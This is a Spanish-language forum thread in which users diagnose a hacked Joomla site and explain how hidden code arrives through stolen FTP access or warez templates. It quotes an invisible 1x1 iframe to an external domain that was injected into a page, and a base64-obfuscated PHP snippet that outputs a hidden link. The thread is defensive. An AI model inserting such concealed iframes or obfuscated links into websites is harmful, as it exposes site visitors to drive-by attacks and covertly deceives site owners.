Cita:
Iniciado por Larenz Vi tu web. Honestamente no me saltó para nada ningún iframe o al menos no logré visualizarlo... pero en el código fuente (creo que un menú) llama directamente a ese url externa a través de un iframe.
Sigo pensando que fue que alguien logró entrar a tu panel de control e hizo ese cambio en tu código fuente de tus archivos.
También este tipo de percances suceden a la hora de descargar módulos, componentes o plugins en sitios warez. Algunos programadores o usuarios avanzados insertan códigos ocultos o encriptados para llamar a ciertas webs. Por ejemplo la plantilla de
TemplatePlazza que se llama
MyStorePlazza tiene en su
index.php un código en php cifrado que llama a la siguiente url
www.jsharing.com (el cual seguro es un sitio warez). El código es el siguiente:
Código PHP:
<?php
echo base64_decode('PGRpdiBzdHlsZT0iZGlzcGxheTpub25lIj48YSBocmVmPSJodHRwOi8valNoYXJpbmcuY29tIj5Kb29tbGEgSnVzdCBmb3IgU2hhcmluZyAtIEpvb21sYSBDbHViIFRlbXBsYXRlcyBhbmQgRXh0ZW5zaW9uczwvYT48L2Rpdj4=');
?>
Su etiqueta
div tiene la función
display:none de forma que no se mostrará en el navegador y estará oculto.
Ese es un ejemplo o una idea de lo que una persona maliciosa puede hacernos en nuestros archivos casi sin darnos cuenta. En tu caso está de sobra leer la advertencia que muestra
Google Chrome o Firefox al entrar a tu sitio, como para darse cuenta que alguien puso código malicioso.
Tienes que ser cuidadoso y verificar qué otro archivo más pudo haber sido modificado. Muchas veces te puedes auxiliar del mismo
Dreamweaver... yo lo configuro para que me busque determinada palabra o código en todo el directorio raíz de
Joomla.
Hola amigo creo que alguien entro a mi host por el FTP, tengo un archivo index.html que yo hice para avisar que estamos haciendo la nueva web...
Y lo extraño de todo esto es que encontre al final del codigo de ese index.html:
<iframe src="http://odiklaf.com/?click=3CDF3A" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
Pueden verlo aca:
http://www.galapagosfirst.com/index.html
Acabo de cambiar las claves del FTP, de los usuarios, de todo!
Saludos